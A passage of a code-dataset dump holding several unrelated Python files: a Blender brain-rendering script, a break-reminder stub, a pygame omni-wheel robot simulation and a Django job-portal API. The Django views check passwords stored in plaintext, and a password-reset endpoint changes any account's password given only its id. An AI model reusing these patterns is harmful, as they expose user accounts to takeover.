lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\n # print(lampaaa)\n\n\nclass CorticalPainterInner(CorticalPainter):\n def __init__(self, cortFiles):\n self.cortFiles = cortFiles\n\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1.0)\n obj.data.materials.append(material)\n else:\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n\n self.prepareCamera(resolution, fov)\n\n pi = 3.14159265\n scene.camera.rotation_euler = (pi / 2, 0, -pi / 2)\n # Set camera location\n scene.camera.location = (-71, -15.1, 3.824)\n if BRAIN_TYPE == 'inflated':\n scene.camera.location = (-71, -1.3, 3.824)\n\n bpy.data.cameras['Camera'].type = 'ORTHO'\n bpy.data.cameras['Camera'].ortho_scale = ortho_scale\n bpy.data.cameras['Camera'].clip_end = 1000\n\n def setLamp(self, BRAIN_TYPE):\n\n energyAll = 5\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2, 3, 4]\n # y + 20\n lampLocs = [(-80, 70, 72), (-80, -80, -64), (-80, -80, 72), (-80, 70, -64)]\n if BRAIN_TYPE == 'inflated':\n lampIndices = [1, 2, 3, 4, 5]\n lampLocs = [(-130, 150, 70), (-130, -150, -120), (-130, -150, 70), (-130, 150, -130), (-130, 0, 170), (-90, 0, -90)]\n energyAll = 11\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\n # print(lampaaa)\n\n\nclass SubcorticalPainter(BrainPainter):\n def __init__(self, cortFiles, subcortFiles):\n self.cortFiles = cortFiles\n self.subcortFiles = subcortFiles\n\n # def loadSubcortical(self, cortFiles, subcortFiles):\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 0.1)\n obj.data.materials.append(material)\n else:\n bpy.data.materials['mat_%s' % regionName].diffuse_color = (0.3, 0.3, 0.3)\n bpy.data.materials['mat_%s' % regionName].alpha = 1\n\n obj.select = False\n\n # import subcortical regions\n for i in range(len(self.subcortFiles)):\n 
bpy.ops.import_mesh.ply(filepath=self.subcortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1)\n obj.data.materials.append(material)\n else:\n # assert(False)\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n self.prepareCamera(resolution, fov)\n\n # scene.camera.rotation_euler = (1.15, -0.02, -8.63) # subcort only\n scene.camera.rotation_euler = (1.1499, -0.01999, -8.2985) # half-cort half subcort\n\n # Set camera translation\n # scene.camera.location = (-107.3, 66.8, 43.1) # subcort only\n scene.camera.location = (-168.3, 66.8, 83.1) # half cort half subcort\n\n bpy.data.cameras['Camera'].clip_end = 1000\n\n def setLamp(self, BRAIN_TYPE):\n\n energyAll = 7\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2]\n lampLocs = [(-82.53, 0.79, 72.87), (88.53, 119.79, 72.87)]\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\ndef delobj():\n scene = bpy.data.scenes[\"Scene\"]\n for ob in scene.objects:\n if ob.type == 'MESH' and (\n ob.name.startswith(\"Left\") or ob.name.startswith(\"Right\") or ob.name.startswith('lh.') or ob.name.startswith(\n 'rh.')):\n ob.select = True\n else:\n ob.select = False\n if ob.name.startswith('Lamp'):\n ob.select = True\n bpy.ops.object.delete()\n bpy.ops.object.material_slot_remove()\n for material in bpy.data.materials:\n if not material.users:\n bpy.data.materials.remove(material)\n\n\ndef makeMaterial(name, diffuse, specular, alpha):\n mat = bpy.data.materials.new(name)\n mat.diffuse_color = diffuse\n mat.diffuse_shader = 'LAMBERT'\n mat.diffuse_intensity = 1.0\n mat.specular_color = specular\n mat.specular_shader = 'COOKTORR'\n mat.specular_intensity = 0.2\n mat.alpha = alpha\n mat.ambient = 1\n mat.use_transparency = True\n mat.use_shadows = False\n return mat\n\n\ndef setMaterial(ob, mat):\n me = ob.data\n me.materials.append(mat)\n\n\n\ndef colorRegionsAndRender(indexMap, matDf, COLOR_POINTS, COLOR_POINTS_NEG, OUT_FOLDER, IMG_TYPE):\n objList = bpy.context.selected_objects[::-1] # make sure to remove the cube from the scene\n # print(objList)\n\n cols = matDf.columns.to_list()\n imageNames = matDf.loc[:,'Image-name-unique'].values\n\n imageNames = [''.join(n.split(' ')) for n in imageNames] # remove spaces in names\n matDf = matDf.loc[:,cols[1]:]\n\n for imgIndex in range(matDf.shape[0]):\n\n # for each event get the sum of all the probabilities until the current stage\n # eventsAbnormality = matDf.loc[imgIndex,:].values\n\n # calc abnorm for plottable biomk\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n # print(obj.name, obj, obj.type)\n 
regionName = obj.name\n\n if regionName in indexMap.keys():\n # 'Left-Caudate -> nonZlabelNr -> [z-labelNrs], between 1-3'\n targetLabel = indexMap[regionName]\n if targetLabel != -1:\n\n\n # abnormality values for each significance levels\n signifAbnorm = matDf.loc[imgIndex,targetLabel]\n\n # colors for each significance levels\n finalColor = getInterpColor(signifAbnorm, COLOR_POINTS, COLOR_POINTS_NEG) #modified by Justin Chen to represent negative values 5/27/20\n\n # print(\"regionName\", regionName, finalColor)\n\n # if regionName == 'rh.pial.DK.inferiorparietal':\n # print('targetLabel', targetLabel)\n # print('finalColor', finalColor)\n # print('signifAbnorm', signifAbnorm)\n\n # material = makeMaterial('mat_%d_%d_%s' % (matrixIndex, imgIndex, regionName), finalColor, (1,1,1), 1)\n # setMaterial(obj, material)\n # obj.material_slots[0].material = bpy.data.materials['mat_%d_%d_%s' % (matrixIndex, imgIndex, regionName)]\n bpy.data.materials['mat_%s' % regionName].diffuse_color = finalColor\n\n # obj.data.materials.append(material)\n\n else:\n print('object not found: %s' % obj.name)\n\n # print(adsas)\n outputFile = '%s/%s_%s.png' % (OUT_FOLDER, IMG_TYPE, imageNames[imgIndex])\n print('rendering file %s' % outputFile)\n bpy.data.scenes['Scene'].render.filepath = outputFile\n bpy.ops.render.render(write_still=True)\n \n #modified by Justin Chen 5/22/20\n # flip right images\n if \"right\" in imageNames[imgIndex]:\n im = Image.open(outputFile)\n out = im.transpose(PIL.Image.FLIP_LEFT_RIGHT)\n out.save(outputFile)\n\n #img = mpimg.imread(outputFile)\n #img = mpimg.imread('E:/Users/spectR/Desktop/%Rutgers/RESEARCH/brain-coloring/output/DK_output/cortical-inner_left_area.png')\n #img2 = np.fliplr(img)\n #plt.imshow(img2)\n #plt.axis(\"off\")\n #plt.subplots_adjust(bottom = 0)\n #plt.subplots_adjust(top = 1)\n #plt.subplots_adjust(right = 1)\n #plt.subplots_adjust(left = 0)\n #plt.savefig(outputFile, dpi=200)\n #plt.show()\n #plt.close()\n\n # delete extraneous subcorticals\n if \"subcortical\" in IMG_TYPE:\n if \"grayvol\" in imageNames[imgIndex] or \"thck\" in imageNames[imgIndex]:\n os.remove(outputFile)\n #end of modification - Justin Chen 5/22/20\n sys.stdout.flush()\n\n","repo_name":"jutchn/Research","sub_path":"Brainpainter/blendHelper.py","file_name":"blendHelper.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8127908960","text":"'''\nCriar uma função que me lembre a parar de estudar e fazer uma pausa a cada 2h\nTrabalho inicia de 8h às 12\n'''\n\nimport webbrowser\nimport time\n\nintervalo = 2\ncontador = 0\nprint('O programa de controle de descanso foi ativado.')\n\n\nwhile contador < intervalo:\n time.sleep(10)\n","repo_name":"lssdeveloper/python3em6h","sub_path":"pausa_para _descansar.py","file_name":"pausa_para _descansar.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24201659705","text":"import pygame\nfrom math import sin, cos, tan, radians, sqrt, atan2\n\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (800, 800)\nscreen = pygame.display.set_mode(size)\n\npygame.display.set_caption(\"Omni_simu\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = 
pygame.time.Clock()\n\nSIZE = 20\nspeed_a = 0 #cm.s-1\nspeed_b = 0\nspeed_c = 0\nyaw = 0\ncx = 300\ncy = 300\njoy = pygame.joystick.Joystick(0)\njoy.init()\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # --- Game logic should go here\n axis_yaw = joy.get_axis(0)\n axis_roll = joy.get_axis(3)\n axis_pitch = joy.get_axis(4)\n\n speed_cmd = sqrt(axis_roll * axis_roll + axis_pitch * axis_pitch)\n angle_cmd = atan2(axis_pitch, axis_roll) - radians(90)\n\n\n print(axis_yaw, axis_roll, axis_pitch)\n\n #speed_a = 0.5 * axis_yaw + 0.5 * cos(angle_cmd)\n speed_a = 0.5 * axis_yaw + 0.5 * cos(radians(90) + angle_cmd) * speed_cmd\n #speed_b = 0.5 * axis_yaw + 0.5 * cos(radians(60) + angle_cmd)\n speed_b = 0.5 * axis_yaw + 0.5 * cos(radians(210) + angle_cmd) * speed_cmd\n #speed_c = 0.5 * axis_yaw + 0.5 * cos(radians(-60) + angle_cmd)\n speed_c = 0.5 * axis_yaw + 0.5 * cos(radians(-30) + angle_cmd) * speed_cmd\n print('**', speed_a, speed_b, speed_c, yaw)\n\n #print(axis_yaw)\n vec_a = (speed_a * cos(radians(yaw)), speed_a * -sin(radians(yaw)))\n vec_b = (speed_b * cos(radians(yaw + 120)), speed_b * -sin(radians(yaw + 120)))\n vec_c = (speed_c * cos(radians(yaw - 120)), speed_c * -sin(radians(yaw - 120)))\n vec_res = tuple(map(sum, zip(vec_a, vec_b, vec_c)))\n cx += vec_res[0] * 10\n cy += vec_res[1] * 10\n yaw -= (speed_a + speed_b + speed_c) * 10\n polygon_points = [[cx + SIZE * cos(radians(90 + yaw)),\n cy - SIZE * sin(radians(90 + yaw))],\n [cx + SIZE * cos(radians(-30 + yaw)),\n cy - SIZE * sin(radians(-30 + yaw))],\n [cx + SIZE * cos(radians(-150 + yaw)),\n cy - SIZE * sin(radians(-150 + yaw))]]\n\n # --- Screen-clearing code goes here\n\n # Here, we clear the screen to white. 
Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n screen.fill(WHITE)\n\n # --- Drawing code should go here\n pygame.draw.polygon(screen, BLACK, polygon_points)\n pygame.draw.circle(screen, RED, [int(polygon_points[0][0]), int(polygon_points[0][1])], 5)\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(30)\n\n# Close the window and quit.\npygame.quit()\n","repo_name":"agervail/holo_robot","sub_path":"simu/simu_pygame.py","file_name":"simu_pygame.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16368519522","text":"import datetime\nfrom django.shortcuts import render\nfrom .serializers import *\nfrom .models import *\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status,viewsets\nfrom django.http import Http404\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth.hashers import check_password\nfrom django.http import HttpResponse\n# Create your views here.\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass usertype(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_type.objects.all()\n serializer_class = user_type_serializer\n\n def get(self, request, format=None):\n data = user_type.objects.all().order_by('-createdDate')\n serializer = user_type_serializer(data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass usersaveaccount(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_account.objects.all()\n serializer_class = user_account_serializer\n\n def get(self, request, format=None):\n user_data = user_account.objects.all().order_by('-createdDate')\n serializer = user_account_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n\n user_type_id = request.data.get('user_type_id')\n if user_type_id:\n userObject = user_type.objects.get(pk=user_type_id)\n request.data['isactive'] = True\n serializer = user_account_serializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(user_type_id=userObject)\n user_id = user_account.objects.last()\n userlogObject = user_account.objects.get(pk=user_id.id)\n log_Data={\n 'last_login_date':datetime.datetime.now()\n }\n logserializer = user_log_serializer(data=log_Data)\n if logserializer.is_valid():\n logserializer.save(user_account_id=userlogObject)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass edituseraccount(APIView):\n def 
get_object(self, pk):\n try:\n return user_account.objects.get(pk=pk)\n except user_account.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = user_account_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, pk, format=None):\n userObject = user_account.objects.get(pk=request.data['id'])\n addmoreUser = self.get_object(pk)\n serializer = user_account_serializer(addmoreUser, data=request.data)\n if serializer.is_valid():\n serializer.save(staff=userObject)\n return Response(serializer.data)\n \nclass userlog(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_log.objects.all()\n serializer_class = user_log_serializer\n\n def get(self, request, format=None):\n user_data = user_log.objects.all().order_by('-createdDate')\n serializer = user_log_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n\n\nclass userlogin(APIView):\n def login(request):\n if request.method == 'POST':\n email = request.POST.get('email')\n password = request.POST.get('password')\n\n try:\n user = user_account.objects.get(email=email, password=password)\n # If the query succeeds, a matching user account was found\n return HttpResponse('Login successful')\n except user_account.DoesNotExist:\n # If the query fails, there is no matching user account\n return HttpResponse('Invalid email or password')\n\n # If the request method is not POST, return an empty response\n return HttpResponse()\n\n \nclass forgotpassword(APIView):\n def post(self, request, *args, **kwargs):\n my_model_instance = user_account.objects.get(id=request.data['id'])\n my_model_instance.password = request.data['password']\n my_model_instance.save(update_fields=['password'])\n return Response({'success': True})\n \nclass businessstream(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = business_stream.objects.all()\n serializer_class = business_stream_serializer\n\n def get(self, request, format=None):\n user_data = business_stream.objects.all().order_by('-createdDate')\n serializer = business_stream_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n serializer = business_stream_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass companyadddetails(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = company.objects.all()\n serializer_class = company_serializer\n\n def get(self, request, format=None):\n user_data = company.objects.all().order_by('-createdDate')\n serializer = company_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n company_name = request.data.get('company_name')\n profile_description = request.data.get('profile_description')\n business_stream_id = request.data.get('business_stream_id')\n\n establishment_date = request.data.get('establishment_date')\n company_website_url = request.data.get('company_website_url')\n\n business_stream_id = business_stream.objects.get(id=business_stream_id)\n\n company_data = company(company_name=company_name, profile_description=profile_description, 
business_stream_id=business_stream_id, \n establishment_date=establishment_date,company_website_url=company_website_url)\n company_data.save() \n\n company_id = company_data.id\n company_id_instance = company.objects.get(id=company_id)\n company_image_data = request.data.get('company_image')\n\n company_image_instance = company_image(company_id=company_id_instance, company_image=company_image_data)\n company_image_instance.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\nclass companyprofile(APIView):\n def get_object(self, pk):\n try:\n return company.objects.get(pk=pk)\n except company.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = company_serializer(data)\n return Response(serializer.data)\n \nclass companysaveimage(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = company_image.objects.all()\n serializer_class = company_image_serializer\n\n def get(self, request, format=None):\n user_data = company_image.objects.all().order_by('-createdDate')\n serializer = company_image_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass postjob(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post.objects.all()\n serializer_class = job_post_serializer\n\n def get(self, request, format=None):\n user_data = job_post.objects.all().order_by('-createdDate')\n serializer = job_post_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n # Extract data from request.data\n street_address = request.data.get('street_address')\n city = request.data.get('city')\n state = request.data.get('state')\n country = request.data.get('country')\n zip = request.data.get('zip')\n jobtypeid=request.data.get('job_type_id')\n companyid=request.data.get('company_id')\n useraccountid=request.data.get('user_account_id')\n \n\n joblocation = job_location(street_address=street_address, city=city, state=state, country=country,zip=zip)\n joblocation.save()\n\n job_type_id = job_type.objects.get(id=jobtypeid)\n company_id = company.objects.get(id=companyid)\n user_account_id=user_account.objects.get(id=useraccountid)\n is_company_name_hidden = request.data.get('is_company_name_hidden')\n job_description = request.data.get('job_description')\n job_location_id = joblocation.id\n created_date=request.data.get('created_date')\n is_active = request.data.get('is_active')\n\n job_location_instance = job_location.objects.get(id=job_location_id)\n\n jobpost=job_post(job_type_id=job_type_id,company_id=company_id,is_company_name_hidden=is_company_name_hidden,\n job_description=job_description,job_location_id=job_location_instance,created_date=created_date,is_active=is_active)\n jobpost.save()\n\n skill_level=request.data.get('skill_level')\n skillsetid=request.data.get('skill_set_id')\n \n skill_set_id=skill_set.objects.get(id=skillsetid)\n job_post_id=jobpost.id\n job_post_instance = job_post.objects.get(id=job_post_id)\n \n jobpostskillset=job_post_skill_set(skill_set_id=skill_set_id,skill_level=skill_level,job_post_id=job_post_instance)\n jobpostskillset.save()\n\n\n\n jobpostactivity=job_post_activity(user_account_id=user_account_id,job_post_id=job_post_instance,apply_date=datetime.datetime.now())\n jobpostactivity.save()\n\n 
userlog=user_log(user_account_id=user_account_id,last_job_apply_date=datetime.datetime.now())\n userlog.save()\n\n # user_log_instance = user_log.objects.get(user_account_id=user_account_id)\n # user_log_instance.last_job_apply_date = datetime.datetime.now()\n # user_log_instance.save()\n \n return Response(status=status.HTTP_201_CREATED)\n\nclass editjob(APIView):\n def get_object(self, pk):\n try:\n return job_post.objects.get(pk=pk)\n except job_post.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = job_post_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, pk, format=None):\n jobpost = self.get_object(pk)\n \n # Update job_location fields\n joblocation = jobpost.job_location_id\n joblocation.street_address = request.data.get('street_address', joblocation.street_address)\n joblocation.city = request.data.get('city', joblocation.city)\n joblocation.state = request.data.get('state', joblocation.state)\n joblocation.country = request.data.get('country', joblocation.country)\n joblocation.zip = request.data.get('zip', joblocation.zip)\n joblocation.save()\n\n # Update job_post fields\n jobpost.job_type_id = job_type.objects.get(id=request.data.get('job_type_id', jobpost.job_type_id.id))\n jobpost.company_id = company.objects.get(id=request.data.get('company_id', jobpost.company_id.id))\n jobpost.is_company_name_hidden = request.data.get('is_company_name_hidden', jobpost.is_company_name_hidden)\n jobpost.job_description = request.data.get('job_description', jobpost.job_description)\n jobpost.job_location_id = joblocation\n jobpost.created_date = request.data.get('created_date', jobpost.created_date)\n jobpost.is_active = request.data.get('is_active', jobpost.is_active)\n jobpost.save()\n\n # Update job_post_skill_set fields\n jobpostskillset = job_post_skill_set.objects.get(job_post_id=jobpost.id)\n jobpostskillset.skill_set_id = skill_set.objects.get(id=request.data.get('skill_set_id', jobpostskillset.skill_set_id.id))\n jobpostskillset.skill_level = request.data.get('skill_level', jobpostskillset.skill_level)\n jobpostskillset.save()\n\n # Update job_post_activity fields\n jobpostactivity = job_post_activity.objects.get(job_post_id=jobpost.id)\n jobpostactivity.user_account_id = user_account.objects.get(id=request.data.get('user_account_id', jobpostactivity.user_account_id.id))\n jobpostactivity.apply_date = request.data.get('apply_date', jobpostactivity.apply_date)\n jobpostactivity.save()\n\n # Update user_log fields\n userlog = user_log.objects.last()\n userlog.last_job_apply_date = jobpostactivity.apply_date\n userlog.save()\n\n serializer = job_post_serializer(jobpost)\n return Response(serializer.data)\n \n \nclass joblocation(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_location.objects.all()\n serializer_class = job_location_serializer\n\n def get(self, request, format=None):\n user_data = job_location.objects.all().order_by('-createdDate')\n serializer = job_location_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n serializer = job_location_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass educationdetail(APIView):\n # Return a list of all userreg objects 
serialized using userregSerializer\n\n queryset = education_detail.objects.all()\n serializer_class = education_detail_serializer\n\n def get(self, request, format=None):\n user_data = education_detail.objects.all().order_by('-createdDate')\n serializer = education_detail_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass seekerskillset(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = seeker_skill_set.objects.all()\n serializer_class = seeker_skill_set_serializer\n\n def get(self, request, format=None):\n user_data = seeker_skill_set.objects.all().order_by('-createdDate')\n serializer = seeker_skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass jobpostactivity(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post_activity.objects.all()\n serializer_class = job_post_activity_serializer\n\n def get(self, request, format=None):\n user_data = job_post_activity.objects.all().order_by('-createdDate')\n serializer = job_post_activity_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass experincedetail(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = experience_detail.objects.all()\n serializer_class = experience_detail_serializer\n\n def get(self, request, format=None):\n user_data = experience_detail.objects.all().order_by('-createdDate')\n serializer = experience_detail_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass skills(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = skill_set.objects.all()\n serializer_class = skill_set_serializer\n\n def get(self, request, format=None):\n user_data = skill_set.objects.all().order_by('-createdDate')\n serializer = skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass skillset(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post_skill_set.objects.all()\n serializer_class = job_post_skill_set_serializer\n\n def get(self, request, format=None):\n user_data = job_post_skill_set.objects.all().order_by('-createdDate')\n serializer = job_post_skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass jobtype(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_type.objects.all()\n serializer_class = job_type_serializer\n\n def get(self, request, format=None):\n user_data = job_type.objects.all().order_by('-createdDate')\n serializer = job_type_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass seekerprofile(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = seeker_profile.objects.all()\n serializer_class = seeker_profile_serializer\n\n def get(self, request, format=None):\n user_data = seeker_profile.objects.all().order_by('-createdDate')\n serializer = seeker_profile_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n\n \n def post(self, request, format=None):\n useraccountid=request.data.get('user_account_id')\n\n 
user_account_id=user_account.objects.get(id=useraccountid)\n\n first_name = request.data.get('first_name')\n last_name = request.data.get('last_name')\n current_salary = request.data.get('current_salary')\n is_annually_monthly = request.data.get('is_annually_monthly')\n currency = request.data.get('currency')\n uploaded_cv = request.data.get('uploaded_cv')\n\n seekerprofile=seeker_profile(user_account_id=user_account_id,first_name=first_name,last_name=last_name,\n current_salary=current_salary,is_annually_monthly=is_annually_monthly,currency=currency,uploaded_cv=uploaded_cv)\n seekerprofile.save()\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n certificate_degree_name = request.data.get('certificate_degree_name')\n major = request.data.get('major')\n institute_university_name = request.data.get('institute_university_name')\n starting_date = request.data.get('starting_date')\n completion_date = request.data.get('completion_date')\n percentage = request.data.get('percentage')\n cgpa = request.data.get('cgpa')\n\n educationdetail=education_detail(user_account_id=user_account_id,certificate_degree_name=certificate_degree_name,major=major,\n institute_university_name=institute_university_name,starting_date=starting_date,completion_date=completion_date,percentage=percentage,cgpa=cgpa)\n educationdetail.save()\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n is_current_job = request.data.get('is_current_job')\n start_date = request.data.get('start_date')\n end_date = request.data.get('end_date')\n job_title = request.data.get('job_title')\n company_name = request.data.get('company_name')\n job_location_city = request.data.get('job_location_city')\n job_location_state = request.data.get('job_location_state')\n job_location_country = request.data.get('job_location_country')\n description = request.data.get('description')\n\n experincedetail=experience_detail(user_account_id=user_account_id,is_current_job=is_current_job,start_date=start_date,\n end_date=end_date,job_title=job_title,company_name=company_name,job_location_city=job_location_city,job_location_state=job_location_state,job_location_country=job_location_country,description=description)\n experincedetail.save()\n\n useraccountid=request.data.get('user_account_id')\n skillsetid=request.data.get('skill_set_id')\n \n skill_set_id=skill_set.objects.get(id=skillsetid)\n user_account_id=user_account.objects.get(id=useraccountid) \n skill_level = request.data.get('skill_level')\n\n seekerskillset=seeker_skill_set(user_account_id=user_account_id,skill_set_id=skill_set_id,skill_level=skill_level)\n seekerskillset.save()\n\n return Response(status=status.HTTP_201_CREATED)\n \nclass trendingnews(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = trending_news.objects.all()\n serializer_class = trending_news_serializer\n\n def get(self, request, format=None):\n user_data = trending_news.objects.all().order_by('-createdDate')\n serializer = trending_news_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n news_title = request.data.get('news_title')\n news_description = request.data.get('news_description')\n news_image = request.data.get('news_image')\n\n 
